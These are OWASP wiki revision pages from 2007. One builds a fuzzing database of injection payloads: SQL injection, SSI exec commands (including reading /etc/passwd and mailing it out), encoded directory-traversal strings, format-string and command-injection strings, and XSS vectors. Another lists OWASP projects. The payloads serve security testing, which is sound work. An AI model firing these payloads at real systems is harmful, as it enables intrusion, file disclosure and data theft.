%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x<br />
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s<br />
XXXXX.%p<br />
XXXXX`perl -e 'print ".%p" x 80'`<br />
`perl -e 'print ".%p" x 80'`%n<br />
%08x.%08x.%08x.%08x.%08x\n<br />
XXX0_%08x.%08x.%08x.%08x.%08x\n<br />
%.16705u%2\$hn<br />
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|<br />
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id > /tmp/file; exit;<br />
<br />
</pre></div>
Foobar23
https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&diff=20475
Category:OWASP Fuzzing Code Database
2007-07-30T13:51:33Z
<p>Foobar23: First Edit</p>
<hr />
<div>This database is a collection of several statements used in code injection software. All to often security professionals use their own repositories of statements collected from several projects for a long time. We want to collect all these statements - compose them - merging the database of several projects like [[WebScarab]] and [[JBroFuzz]] gaining a big dataset of effective statements to provide better testing results.<br />
Please add your own statements and check the statements already added. <br />
<br />
=== SQL Injection Statements ===<br />
<br />
<pre><br />
<br />
'sqlvuln<br />
'+sqlvuln<br />
sqlvuln;<br />
(sqlvuln)<br />
a' or 1=1--<br />
a" or 1=1--<br />
a" or "a" = "a<br />
a' or 'a' = 'a<br />
1 or 1=1<br />
a' waitfor delay '0:0:10'--<br />
1 waitfor delay '0:0:10'--<br />
declare @q nvarchar (4000) select @q =<br />
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A<br />
0<br />
031003000270000<br />
declare @s varchar(22) select @s =<br />
0x77616974666F722064656C61792027303A303A31302700 exec(@s)<br />
declare @q nvarchar (4000) select @q =<br />
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)<br />
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e<br />
exec(@s)<br />
a'<br />
?<br />
' or 1=1<br />
‘ or 1=1 --<br />
x' AND userid IS NULL; --<br />
x' AND email IS NULL; --<br />
anything' OR 'x'='x<br />
x' AND 1=(SELECT COUNT(*) FROM tabname); --<br />
x' AND members.email IS NULL; --<br />
x' OR full_name LIKE '%Bob%<br />
23 OR 1=1<br />
'; exec master..xp_cmdshell 'ping 172.10.1.255'--<br />
<br />
</pre><br />
<br />
=== SSI (Server Side Includes) Statements ===<br />
<br />
<pre><br />
<br />
<!--#exec cmd="/bin/ls /" --><br/><br />
<!--#exec cmd="cat /etc/passwd" --><br/><br />
<!--#exec cmd="find / -name *.* -print" --><br/><br />
<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/><br />
<br />
</pre><br />
<br />
<br />
=== Directory Traversal Statements ===<br />
<br />
<pre><br />
<br />
\..\WINDOWS\win.ini<br />
\..\..\WINDOWS\win.ini<br />
\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\..\WINDOWS\win.ini<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
../../../../../../../../../etc/passwd<br />
../../../../../../../../etc/passwd<br />
../../../../../../../etc/passwd<br />
../../../../../../etc/passwd<br />
../../../../../etc/passwd<br />
../../../../etc/passwd<br />
../../../etc/passwd<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
../../../.htaccess<br />
../../.htaccess<br />
../.htaccess<br />
.htaccess<br />
././.htaccess<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%68%74%61%63%63%65%73%73<br />
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
<br />
</pre><br />
<br />
=== XSS Statements ===<br />
<br />
<pre><br />
<br />
<a href="javas&#99;ript&#35;[code]"><br />
<a href="javas&#99;ript&#35;[code]"><br />
<div onmouseover="[code]"><br />
<img src="javascript:[code]"><br />
<img dynsrc="javascript:[code]"><br />
<input type="image" dynsrc="javascript:[code]"><br />
<bgsound src="javascript:[code]"><br />
&<script>[code]</script><br />
&{[code]};<br />
<img src=&{[code]};><br />
<link rel="stylesheet" href="javascript:[code]"><br />
<iframe src="vbscript:[code]"><br />
<img src="mocha:[code]"><br />
<img src="livescript:[code]"><br />
<a href="about:<s&#99;ript>[code]</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:[code]"><br />
<body onload="[code]"><br />
<div style="background-image: url(javascript:[code]);"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"><br />
<div style="width: expression([code]);"><br />
<style type="text/javascript">[code]</style><br />
<object classid="clsid:..." codebase="javascript:[code]"><br />
<style><!--</style><script>[code]//--></script><br />
<![CDATA[<!--]]><script>[code]//--></script><br />
<!-- -- --><script>[code]</script><!-- -- --><br />
<<script>[code]</script><br />
<img src="blah"onmouseover="[code]"><br />
<img src="blah>" onmouseover="[code]"><br />
<xml src="javascript:[code]"><br />
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
<a href="javas&#99;ript&#35;[code]"><br />
<div onmouseover="[code]"><br />
<img src="javascript:[code]"><br />
<img dynsrc="javascript:[code]"><br />
<input type="image" dynsrc="javascript:[code]"><br />
<bgsound src="javascript:[code]"><br />
&<script>[code]</script><br />
&{[code]};<br />
<img src=&{[code]};><br />
<link rel="stylesheet" href="javascript:[code]"><br />
<iframe src="vbscript:[code]"><br />
<img src="mocha:[code]"><br />
<img src="livescript:[code]"><br />
<a href="about:<s&#99;ript>[code]</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:[code]"><br />
<body onload="[code]"><br />
<div style="background-image: url(javascript:[code]);"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"> [Mozilla]<br />
<div style="width: expression([code]);"><br />
<style type="text/javascript">[code]</style><br />
<object classid="clsid:..." codebase="javascript:[code]"><br />
<style><!--</style><script>[code]//--></script><br />
<![CDATA[<!--]]><script>[code]//--></script><br />
<!-- -- --><script>[code]</script><!-- -- --><br />
<<script>[code]</script><br />
<img src="blah"onmouseover="[code]"><br />
<img src="blah>" onmouseover="[code]"><br />
<xml src="javascript:[code]"><br />
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> <br />
<br />
</pre></div>
Foobar23
https://wiki.owasp.org/index.php?title=Category:OWASP_Project&diff=20473
Category:OWASP Project
2007-07-30T13:23:13Z
<p>Foobar23: /* Alpha Status Projects */</p>
<hr />
<div>An OWASP project is a collection of related tasks that have a defined roadmap and team members. OWASP project leaders are responsible for defining the vision, roadmap, and tasks for the project. The project leader also promotes the project and builds the team.<br />
<br />
To propose a new project, please send an email to [mailto:owasp@owasp.org?subject=New_OWASP_Project_idea owasp@owasp.org]<br />
<br />
Every project has an associated mail list. You can view all the lists, examine their archives, and subscribe to any of them on the [http://lists.owasp.org/mailman/listinfo OWASP Project Mailing Lists] page.<br />
<br />
<br />
<br />
<br />
==Release Quality Projects==<br />
<br />
<table><tr><th width="50%">Tools</th><th>Documentation</th></tr><tr valign="top"><td><br />
<br />
; [[:Category:OWASP WebGoat Project|OWASP WebGoat Project]]<br />
: an online training environment for hands-on learning about application security<br />
<br />
; [[:Category:OWASP WebScarab Project|OWASP WebScarab Project]]<br />
: a tool for performing all types of security testing on web applications and web services<br />
<br />
</td><td><br />
<br />
; [[:Category:OWASP AppSec FAQ Project|OWASP AppSec FAQ Project]]<br />
: FAQ covering many application security topics<br />
<br />
; [[:Category:OWASP Guide Project|OWASP Guide Project]]<br />
: a massive document covering all aspects of web application and web service security<br />
<br />
; [[:Category:OWASP Legal Project|OWASP Legal Project]]<br />
: a project focused on contracting for secure software<br />
<br />
; [[:Category:OWASP Testing Project|OWASP Testing Guide]]<br />
: a project focused on application security testing procedures and checklists<br />
<br />
; [[:Category:OWASP Top Ten Project|OWASP Top Ten Project]]<br />
: an awareness document that describes the top ten web application security vulnerabilities<br />
<br />
<br />
</td></tr></table><br />
<br />
==Beta Status Projects==<br />
<br />
<table valign="top"><tr><th width="50%">Tools</th><th>Documentation</th></tr><tr valign="top"><td><br />
<br />
; [[:Category:OWASP CAL9000 Project|OWASP CAL9000 Project]]<br />
: a JavaScript based web application security testing suite<br />
<br />
; [[:Category:OWASP DirBuster Project|OWASP DirBuster Project]]<br />
:DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers.<br />
<br />
; [[:Category:OWASP Encoding Project|OWASP Encoding Project]]<br />
: a project focused on the development of encoding best practices for web applications.<br />
<br />
; [[:Category:OWASP LAPSE Project|OWASP LAPSE Project]]<br />
: an Eclipse-based source-code static analysis tool for Java<br />
<br />
; [[:Category:OWASP Live CD Project|OWASP Live CD Project]]<br />
: a CD containing ready to use versions of application security analysis and testing tools<br />
<br />
; [[:Category:OWASP LiveCD Education Project|OWASP LiveCD Education Project]]<br />
: an educational supplement project containing tutorials, challenges and videos detailing the use of tools contained within the OWASP LiveCD - LabRat. <br />
<br />
; [[:Category:OWASP .NET Project|OWASP .NET Research]]<br />
: a project focused on helping .NET developers build secure applications<br />
<br />
; [[:Category:OWASP Pantera Web Assessment Studio Project|OWASP Pantera Web Assessment Studio Project]]<br />
: a project focused on combining automated capabilities with complete manual testing to get the best results<br />
<br />
; [[:Category:OWASP Sprajax Project|OWASP Sprajax Project]]<br />
: an open source black box security scanner used to assess the security of AJAX-enabled applications<br />
<br />
; [[:Category:OWASP SQLiX Project|OWASP SQLiX Project]]<br />
: a project focused on the development of SQLiX, a full perl-based SQL scanner<br />
<br />
; [[:Category:OWASP WSFuzzer Project|OWASP WSFuzzer Project]]<br />
: a project focused on the development of WSFuzzer, a full python-based Web Services SOAP fuzzer<br />
<br />
; [[ORG_%28Owasp_Report_Generator%29|OWASP Report Generator]]<br />
: a project giving security professionals a way to report and keep track of their projects<br />
<br />
; [[Owasp_SiteGenerator|OWASP Site Generator]]<br />
: a project allowing users to create dynamic sites for use in training, web application scanner testing, etc...<br />
<br />
; [[OWASP_Tiger|OWASP Tiger]]<br />
: OWASP Tiger is a Windows application originally intended to be used for automating the process of testing various known ASP.NET security issues in hosted environments. However, it is much more versatile than that: it can help you construct and send a HTTP requests, receive and analyze the responses, match them against a set of conditions to produce alerts, notifications that something is wrong with the application(s) or service(s) being tested.<br />
<br />
; [[:Category:OWASP WeBekci Project|OWASP WeBekci Project]]<br />
: OWASP WeBekci is a web based ModSecurity 2.x management tool. WeBekci is written in PHP, Its backend is powered by MySQL and the frontend by XAJAX framework.<br />
</td><td><br />
<br />
; [[:Category:OWASP CLASP Project|OWASP CLASP Project]]<br />
: a project focused on defining process elements that reinforce application security<br />
<br />
; [[:Category:OWASP Code Review Project|OWASP Code Review Project]]<br />
: a project to capture best practices for reviewing code<br />
<br />
; [[:Category:OWASP Tools Project|OWASP Tools Project]]<br />
: The OWASP Tools Project's goal is to provide unbiased, practical information and guidance about application security tools.<br />
<br />
</td></tr></table><br />
<br />
==Alpha Status Projects==<br />
<br />
<table valign="top"><tr><th width="50%">Tools</th><th>Documentation</th></tr><tr valign="top"><td><br />
<br />
; [[:Category:OWASP PHP AntiXSS Library Project|OWASP PHP AntiXSS Library Project]]<br />
: reduce cross-site scripting vulnerabilities by encoding your output<br />
<br />
; [[:Category:OWASP Insecure Web App Project|OWASP Insecure Web App Project]]<br />
: a web application that includes common web application vulnerabilities<br />
<br />
; [[:Category:OWASP Interceptor Project|OWASP Interceptor Project]]<br />
: a testing tool for XML web service and Ajax interfaces<br />
<br />
; [[:Category:OWASP JBroFuzz|OWASP JBroFuzz Project]]<br />
: a fuzzer application, supporting a number of automated security checks including basic cross site scripting checks (XSS) as well as basic SQL injection testing.<br />
<br />
; [[:Category:OWASP Orizon Project|OWASP Orizon Project]]<br />
: a project focused on the development of a flexible code review engine<br />
<br />
; [[:Category:OWASP Stinger Project|OWASP Stinger Project]]<br />
: a project focus on the development of a centralized input validation mechanism which can be easily applied to existing or developmental applications<br />
<br />
; [[:Category:OWASP_Web_2.0_Project|OWASP Web 2.0 Project]]<br />
: A place for advanced research of security in the Web 2.0 world <br />
<br />
</td><td><br />
<br />
; [[:Category:OWASP AJAX Security Project|OWASP AJAX Security Guide]]<br />
: investigating the security of AJAX enabled applications<br />
<br />
; [[:Category:OWASP Application Security Assessment Standards Project|OWASP Application Security Assessment Standards Project]]<br />
: establish a set of standards defining baseline approaches to conducting differing types/levels of application security assessment<br />
<br />
; [[:Category:OWASP Application Security Requirements Project|OWASP Application Security Requirements]]<br />
<br />
; [[:Category:OWASP Application Security Metrics Project|OWASP Application Security Metrics Project]]<br />
: identify and provide a set of application security metrics that have been found by contributors to be effective in measuring application security <br />
<br />
; [[:Category:OWASP Career Development Project|OWASP Career Development Project]]<br />
: The OWASP Career Development project is focused on helping application security professionals understand the job market, roles, career paths, and skills to work in the field.<br />
<br />
; [[:Category:OWASP Certification Criteria Project|OWASP Certification Criteria Project]]<br />
<br />
; [[:Category:OWASP Certification Project|OWASP Certification Project]]<br />
: our challenge is to create a plan for certification: a set of OWASP Certification for Developers and Testers. <br />
<br />
; [[:Category:OWASP Communications Project|OWASP Communications Project]]<br />
<br />
; [[:Category:OWASP Honeycomb Project|OWASP Honeycomb Project]]<br />
: a comprehensive and integrated guide to the fundamental building blocks of application security<br />
<br />
; [[:Category:OWASP Java Project|OWASP Java Project]]<br />
: a project focused on helping Java and J2EE developers build secure applications<br />
<br />
; [[:Category:OWASP Logging Project|OWASP Logging Guide]]<br />
: a project to define best practices for logging and log management<br />
<br />
; [[:Category:OWASP PHP Project|OWASP PHP Project]]<br />
: a project focused on helping PHP developers build secure applications<br />
<br />
; [[:Category:OWASP Validation Project|OWASP Validation Project]]<br />
: a project that provides guidance and tools related to validation<br />
<br />
; [[:Category:OWASP WASS Project|OWASP WASS Guide]]<br />
: a standards project to develop more concrete criteria for secure applications<br />
<br />
; [[:Category:OWASP Web Application Security Put Into Practice|OWASP Web Application Security Put Into Practice]]<br />
: real-world web application security for Ruby on Rails, Apache and MySQL<br />
<br />
; [[:Category:OWASP XML Security Gateway Evaluation Criteria Project|OWASP XML Security Gateway Evaluation Criteria]]<br />
: a project to define evaluation criteria for XML Security Gateways<br />
<br />
; [[:Category:OWASP Education Project|OWASP Education Project]]<br />
: a project to build educational tracks and modules for different audiences<br />
<br />
; [[:Category:OWASP on the Move Project|OWASP on The Move Project]]<br />
: a project to match offer and demand regarding OWASP (related) presentations by speakers on web application security events or chapter meetings.<br />
<br />
; [[:Category:OWASP Fuzzing Code Database|OWASP Fuzzing Code Database]]<br />
: a project to collect, share and compose statements used as code injections like SQL, SSI, XSS, Formatstring and as well directory traversal statements. <br />
<br />
</td></tr></table><br />
<br />
__NOTOC__</div>
Foobar23